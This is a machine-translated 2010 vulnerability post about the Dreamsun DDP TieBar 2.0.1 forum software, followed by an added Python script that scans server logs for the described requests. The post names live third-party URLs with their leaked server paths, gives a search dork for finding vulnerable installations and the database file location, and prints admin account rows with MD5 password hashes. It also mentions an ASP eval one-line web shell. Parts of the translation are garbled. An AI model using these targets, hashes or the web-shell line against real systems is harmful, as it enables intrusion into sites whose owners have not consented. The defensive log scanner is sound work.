Dreamcatcher sunshine bar (Dreamsun DDP TieBar) 2.0.1 database path disclosure vulnerabilities and related bugs - bug warning - the black bar safety net

2010-05-06T00:00:00
ID MYHACK58:62201026861
Type myhack58
Reporter Anonymous
Modified 2010-05-06T00:00:00

Description

Today I happened to come across this program. Overall the program is good, but there are several points I want to mention.

1. The post title does not filter null characters.
2. so.asp has an injection point, but CheckStr filters the ' character, so it cannot be injected.
3. The official site also has the database path disclosure: /inc/conndb.asa
4. A vulnerability with some limitations: if the database is saved with an asp, asa or asaspp suffix, <%eval req st("pass")%> is not filtered, which is likely to cause a security risk. The official injection filtering, however, is done well.

http://tieba.dreamsun.cn//inc/conndb.asa

describ:’F:\usr\cn27277\inc\#mydb$\#ddptieba20. beris’is not a valid path. Determine the path name is spelled correctly, and whether the connection to the File Storage Server.

A reminder for newcomers: all of them disclose their paths.

http://www.sz0429.cn/ershou/bbs/inc/conndb.asa

System Init Error,Please Contact With The Webmaster. 2010-5-5
describ:’f:\freehost\suizhong888\\ershou\bbs\inc\azxcs\#ddptieba.asp’not a valid path. Determine the path name is spelled correctly, and whether the connection to the File Storage Server.

Search query: inurl:tzsave.asp Powered by Dreamsun DDP TieBar
Database: database/%23ddptieba201.mdb
Table bbuser, columns usename and password:
    admin  21232f297a57a5a743894a0e4a801fc3
    aaa    21232f297a57a5a743894a0e4a801fc3
    e      e1671797c52e15f763380b45e841ec32
Path disclosure: /inc/conndb.asa
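For an operator who wants to check whether their own installation has received the requests described above, this added example (not part of the original post or of the DDP TieBar code) scans an IIS W3C log for direct requests to include files under /inc/ and for requests for the database file. The log lines and IP addresses are constructed, and it assumes logging is configured with the cs-uri-stem and sc-status fields.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log sample (not from the original page);
# client addresses are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-05-05 10:01:12 192.0.2.10 GET /index.asp - 200
2010-05-05 10:02:40 198.51.100.7 GET /inc/conndb.asa - 500
2010-05-05 10:03:05 198.51.100.7 GET /database/%23ddptieba201.mdb - 200
2010-05-05 10:03:30 198.51.100.7 GET /database/%23ddptieba201.mdb - 404
2010-05-05 10:04:00 192.0.2.10 GET /so.asp key=test 200
"""

# Include files are meant to be pulled in server-side, never requested directly.
INCLUDE_RE = re.compile(r"/inc/[^/]+\.(asa|asp|inc)$", re.I)
# Access databases: *.mdb, or a '#'-prefixed file renamed to .asp/.asa.
DATABASE_RE = re.compile(r"(\.mdb$)|(/#[^/]+\.(asp|asa)$)", re.I)


def scan(log_text):
    """Return (client_ip, decoded_path, status, kind) for suspicious requests."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        path = unquote(row.get("cs-uri-stem", ""))   # %23 -> '#'
        status = row.get("sc-status", "")
        if DATABASE_RE.search(path):
            # 200 means the database file itself was handed to the client.
            kind = "database-served" if status == "200" else "database-probe"
        elif INCLUDE_RE.search(path):
            # A 5xx here is the case where the error page may reveal the path.
            kind = "include-error" if status.startswith("5") else "include-direct"
        else:
            continue
        findings.append((row.get("c-ip"), path, status, kind))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any "database-served" hit means the account table should be treated as disclosed, and any "include-error" hit means the error page for that include file should be checked for a physical path.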

There is also a small bug: sensitive words are filtered, but the prompt shown seems to be written wrong.